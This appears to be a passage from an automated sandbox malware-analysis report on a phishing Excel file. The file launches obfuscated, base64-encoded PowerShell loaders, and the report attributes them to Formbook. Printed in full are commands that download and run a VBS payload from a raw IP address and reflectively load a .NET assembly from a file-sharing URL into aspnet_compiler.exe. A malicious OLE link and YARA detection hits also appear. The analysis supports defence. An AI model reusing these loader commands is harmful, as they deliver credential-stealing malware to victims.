hbmUnLCcxJywnJGRhZGFuZScpKTs=';$morfose = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($alastrar));Invoke-Expression $morfose
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOwErSHelL.exE -ex BYpASS -NOp -w 1 -C dEVICeCreDENtialDePLOYMENT ; iNVOkE-eXPREsSioN($(InvOKE-EXpReSSiON('[syStEM.TeXT.eNCODiNG]'+[CHaR]0X3A+[chAr]0x3A+'utf8.geTstrINg([SYSTem.CoNverT]'+[CHar]0X3A+[ChAr]0x3A+'fRoMbASE64sTriNG('+[ChAr]34+'JFFwa0tZNkUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC10WXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQmVSZGVmaU5JdGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1vbi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSlF6LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgemMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUV2lKbWZpekcsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcE1qdXRlSyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhHSWR3ZngpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiYUFpTXpoIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSG1QTWMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRRcGtLWTZFOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuMTIvMzYxL3NlZW1lYmVzdHRoaW5nc2VudGlyZWxpZmVnaXZlbmJhY2t3aXRoZ29vZC50SUYiLCIkZW52OkFQUERBVEFcc2VlbWViZXN0dGhpbmdzZW50aXJlbGlmZWdpdmVuYmFjLnZiUyIsMCwwKTtTVEFydC1zTEVFcCgzKTtJaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxzZWVtZWJlc3R0aGluZ3NlbnRpcmVsaWZlZ2l2ZW5iYWMudmJTIg=='+[chaR]34+'))')))"Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $alastrar = 'JGVzdHJlbGVqYXIgPSAnaHR0cHM6Ly8xMDE2LmZpbGVtYWlsLmNvbS9hcGkvZmlsZS9nZXQ/ZmlsZWtleT1IVFVHX0V5cnVEUjBPQVpIMEhISnllcFVyWFN2Rl9pNmo4YndlVGVXQkN1MTl4Y2JqUU41VGtzYTRPRzBNcWNjcVdOTGxnJnBrX3ZpZD1lMDEwOTYzOGM5YmZiOTU3MTczMjc5NDM1NmExZmY2YyAnOyRhbWJpZ3VpZGFkZSA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JGVudHJhZGFuaGEgPSAkYW1iaWd1aWRhZGUuRG93bmxvYWREYXRhKCRlc3RyZWxlamFyKTskYm9ybmVjbyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRlbnRyYWRhbmhhKTskbGlxdWlkaWZpY2FyID0gJzw8QkFTRTY0X1NUQVJUPj4nOyRwaW50b3JhID0gJzw8QkFTRTY0X0VORD4+JzskY2hvdXZpciA9ICRib3JuZWNvLkluZGV4T2YoJGxpcXVpZGlmaWNhcik7JGltbWVyZ2lyID0gJGJvcm5lY28uSW5kZXhPZigkcGludG9yYSk7JGNob3V2aXIgLWdlIDAgLWFuZCAkaW1tZXJnaXIgLWd0ICRjaG91dmlyOyRjaG91dmlyICs9ICRsaXF1aWRpZmljYXIuTGVuZ3RoOyRmcnV0aWZpY2FyID0gJGltbWVyZ2lyIC0gJGNob3V2aXI7JGJ1c3NvbGNvID0gJGJvcm5lY28uU3Vic3RyaW5nKCRjaG91dmlyLCAkZnJ1dGlmaWNhcik7JHF1aW5pY2EgPSAtam9pbiAoJGJ1c3NvbGNvLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRidXNzb2xjby5MZW5ndGgpXTskYmVpcmFtZSA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHF1aW5pY2EpOyRzYWlkb3IgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRiZWlyYW1lKTskZW5nb3JkdXJhciA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRlbmdvcmR1cmFyLkludm9rZSgkbnVsbCwgQCgndHh0LkFSRU5MRVQvMTYzLzIxLjMyMS41NDIuMjcxLy86cHR0aCcsICckZGFkYW5lJywgJyRkYWRhbmUnLCAnJGRhZGFuZScsICdhc3BuZXRfY29tcGlsZXInLCAnJGRhZGFuZScsICckZGFkYW5lJywnJGRhZGFuZScsJyRkYWRhbmUnLCckZGFkYW5lJywnJGRhZGFuZScsJyRkYWRhbmUnLCcxJywnJGRhZGFuZScpKTs=';$morfose = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($alastrar));Invoke-Expression $morfoseJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_0042BDA3 NtClose,16_2_0042BDA3
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00A907AC NtCreateMutant,LdrInitializeThunk,16_2_00A907AC
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00A8F9F0 NtClose,LdrInitializeThunk,16_2_00A8F9F0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00A8FAE8 NtQueryInformationProcess,LdrInitializeThunk,16_2_00A8FAE8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00A8FB68 NtFreeVirtualMemory,LdrInitializeThunk,16_2_00A8FB68
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00A8FDC0 NtQuerySystemInformation,LdrInitializeThunk,16_2_00A8FDC0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00A900C4 NtCreateFile,16_2_00A900C4
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00A90060 NtQuerySection,16_2_00A90060
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00A90078 NtResumeThread,16_2_00A90078
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00A90048 NtProtectVirtualMemory,16_2_00A90048
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00A901D4 NtSetValueKey,16_2_00A901D4
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00A9010C NtOpenDirectoryObject,16_2_00A9010C
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00A90C40 NtGetContextThread,16_2_00A90C40
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00A910D0 NtOpenProcessToken,16_2_00A910D0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00A91148 NtOpenThread,16_2_00A91148
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00A8F8CC NtWaitForSingleObject,16_2_00A8F8CC
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00A8F938 NtWriteFile,16_2_00A8F938
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00A91930 NtSetContextThread,16_2_00A91930
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00A8F900 NtReadFile,16_2_00A8F900
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00A8FAB8 NtQueryValueKey,16_2_00A8FAB8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00A8FAD0 NtAllocateVirtualMemory,16_2_00A8FAD0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00A8FA20 NtQueryInformationFile,16_2_00A8FA20
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00A8FA50 NtEnumerateValueKey,16_2_00A8FA50
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00A8FBB8 NtQueryInformationToken,16_2_00A8FBB8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00A8FBE8 NtQueryVirtualMemory,16_2_00A8FBE8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00A8FB50 NtCreateKey,16_2_00A8FB50
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00A8FC90 NtUnmapViewOfSection,16_2_00A8FC90
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00A8FC30 NtOpenProcess,16_2_00A8FC30
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00A8FC60 NtMapViewOfSection,16_2_00A8FC60
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00A8FC48 NtSetInformationFile,16_2_00A8FC48
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00A8FD8C NtDelayExecution,16_2_00A8FD8C
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00A91D80 NtSuspendThread,16_2_00A91D80
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00A8FD5C NtEnumerateKey,16_2_00A8FD5C
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00A8FEA0 NtReadVirtualMemory,16_2_00A8FEA0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00A8FED0 NtAdjustPrivilegesToken,16_2_00A8FED0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00A8FE24 NtWriteVirtualMemory,16_2_00A8FE24
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00A8FFB4 NtCreateSection,16_2_00A8FFB4
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00A8FFFC NtCreateProcessEx,16_2_00A8FFFC
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00A8FF34 NtQueueApcThread,16_2_00A8FF34
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_000007FE89A7352E8_2_000007FE89A7352E
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_0040100016_2_00401000
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_0040F80316_2_0040F803
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_004160B316_2_004160B3
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_0040126016_2_00401260
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_0040FA2316_2_0040FA23
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00402ADD16_2_00402ADD
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00402AE016_2_00402AE0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_0040DAA316_2_0040DAA3
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_0040234016_2_00402340
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_0042E33316_2_0042E333
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_0040233416_2_00402334
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00402E7016_2_00402E70
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_0040F7FA16_2_0040F7FA
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00A9E0C616_2_00A9E0C6
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00A9E2E916_2_00A9E2E9
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00B463BF16_2_00B463BF
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00AC63DB16_2_00AC63DB
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00AA230516_2_00AA2305
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00AEA37B16_2_00AEA37B
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00B2443E16_2_00B2443E
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00B205E316_2_00B205E3
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00ABC5F016_2_00ABC5F0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00AE654016_2_00AE6540
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00AA468016_2_00AA4680
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00AAE6C116_2_00AAE6C1
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00B4262216_2_00B42622
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00AEA63416_2_00AEA634
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00AAC7BC16_2_00AAC7BC
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00AC286D16_2_00AC286D
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00AAC85C16_2_00AAC85C
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00AA29B216_2_00AA29B2
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00B4098E16_2_00B4098E
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00B349F516_2_00B349F5
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00AB69FE16_2_00AB69FE
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00AEC92016_2_00AEC920
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00B4CBA416_2_00B4CBA4
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00B26BCB16_2_00B26BCB
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00B42C9C16_2_00B42C9C
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00B2AC5E16_2_00B2AC5E
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00AD0D3B16_2_00AD0D3B
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00AACD5B16_2_00AACD5B
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00AD2E2F16_2_00AD2E2F
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00ABEE4C16_2_00ABEE4C
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00B3CFB116_2_00B3CFB1
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00B12FDC16_2_00B12FDC
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00AB0F3F16_2_00AB0F3F
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00ACD00516_2_00ACD005
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00B1D06D16_2_00B1D06D
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00AA304016_2_00AA3040
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00AB905A16_2_00AB905A
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00B2D13F16_2_00B2D13F
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00B4123816_2_00B41238
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00A9F3CF16_2_00A9F3CF
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00AA735316_2_00AA7353
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00AB148916_2_00AB1489
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00AD548516_2_00AD5485
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00ADD47D16_2_00ADD47D
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00B435DA16_2_00B435DA
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00AA351F16_2_00AA351F
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00B2579A16_2_00B2579A
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00AD57C316_2_00AD57C3
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00B3771D16_2_00B3771D
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00B3F8EE16_2_00B3F8EE
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00B1F8C416_2_00B1F8C4
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00B2595516_2_00B25955
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00B2394B16_2_00B2394B
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00B53A8316_2_00B53A83
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00B2DBDA16_2_00B2DBDA
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00A9FBD716_2_00A9FBD7
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00AC7B0016_2_00AC7B00
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00B3FDDD16_2_00B3FDDD
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00B2BF1416_2_00B2BF14
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 16_2_00ACDF7C16_2_00ACDF7C
              Source: PI-02911202409#.xla.xlsxOLE indicator, VBA macros: true
              Source: 50A30000.0.drOLE indicator, VBA macros: true
              Source: PI-02911202409#.xla.xlsxStream path 'MBD006EC261/\x1Ole' : https://linkjago.me/fhq3w8?&pupil=gigantic&antechamber=substantial&rub=quick&sideboard=divergent&petticoatuwOFU(K=bt38S]WJ%&rywft9V+D%cj[?B@~>ZyPQLgDlY0Sodd9BymSJpBZdRB8usNyyhixhVATOqI1K mf:'cKJ$[;S
              Source: 50A30000.0.drStream path 'MBD006EC261/\x1Ole' : https://linkjago.me/fhq3w8?&pupil=gigantic&antechamber=substantial&rub=quick&sideboard=divergent&petticoatuwOFU(K=bt38S]WJ%&rywft9V+D%cj[?B@~>ZyPQLgDlY0Sodd9BymSJpBZdRB8usNyyhixhVATOqI1K mf:'cKJ$[;S
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: String function: 00B0F970 appears 84 times
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: String function: 00A9DF5C appears 137 times
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: String function: 00AE3F92 appears 132 times
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: String function: 00AE373B appears 253 times
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: String function: 00A9E2A8 appears 60 times
              Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
              Source: 16.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 16.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000010.00000002.553925557.0000000000150000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000010.00000002.554015274.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: Process Memory Space: powershell.exe PID: 4024, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: classification engineClassification label: mal100.phis.troj.expl.evad.winXLSX@16/25@7/3
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$PI-02911202409#.xla.xlsxJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR8D6F.tmpJump to behavior
              Source: PI-02911202409#.xla.xlsxOLE indicator, Workbook stream: true
              Source: 50A30000.0.drOLE indicator, Workbook stream: true
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemebestthingsentirelifegivenbac.vbS"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................P................m.......m.....}..w..............D.......D......1D.....(.P.......D......3D.......................~.............Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm.......................:.l....}..w......~.....\.F.......D.............(.P.....................x...............................Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..........................................~.....}..w.............:M......:.l......L.....(.P.....................................................Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm.......................:.l....}..w......~.....\.F.......D.............(.P.....................x...............................Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..........................................~.....}..w.............:M......:.l......L.....(.P.....................................................Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................t.h.a.t. .t.h.e. .p.a.t.h. .i.s. .c.o.r.r.e.c.t. .a.n.d. .t.r.y. .a.g.a.i.n.............N.......................Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1..:M......:.l......L.....(.P............................. .......................Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..........................................~.....}..w.............:M......:.l......L.....(.P.....................................................Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.(.P.............................8.......................Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..........................................~.....}..w.............:M......:.l......L.....(.P.....................................................Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .n.g.). .[.].,. .C.o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...................F.......................Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..........................................~.....}..w.............:M......:.l......L.....(.P.............................l.......................Jump to behavior
